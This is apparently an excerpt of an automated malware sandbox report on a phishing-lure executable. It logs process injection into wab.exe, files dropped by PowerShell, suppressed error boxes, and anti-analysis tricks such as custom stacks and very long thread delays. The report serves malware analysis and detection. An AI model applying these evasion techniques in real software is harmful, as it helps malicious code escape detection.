Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_0446AD11 push 8A950820h; ret	14_2_0446AD17
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_04462E56 push edi; iretd	14_2_04462E66
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_04462F38 push esi; ret	14_2_04462F39
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_04462007 push eax; iretd	14_2_0446203D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_0446A0D7 push edx; ret	14_2_0446A0D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_0446A89D push 68950820h; iretd	14_2_0446A8A3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_0446296C push eax; ret	14_2_0446296D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_04460212 push edi; iretd	14_2_04460216
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_04469B71 push eax; retf	14_2_04469B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_0446BB27 push 99110720h; iretd	14_2_0446BB2F

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	File created: \confirmation transfer note ags # 22-00379.exe
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	File created: \confirmation transfer note ags # 22-00379.exe			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe

Jump to dropped file

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API/Special instruction interceptor: Address: 5AF4AC9

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 2F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 21F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 23F70000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7556			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2106			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6964

Thread sleep time: -4611686018427385s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Amcache.hve.18.dr	Binary or memory string: VMware
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.18.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.18.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.18.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.18.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
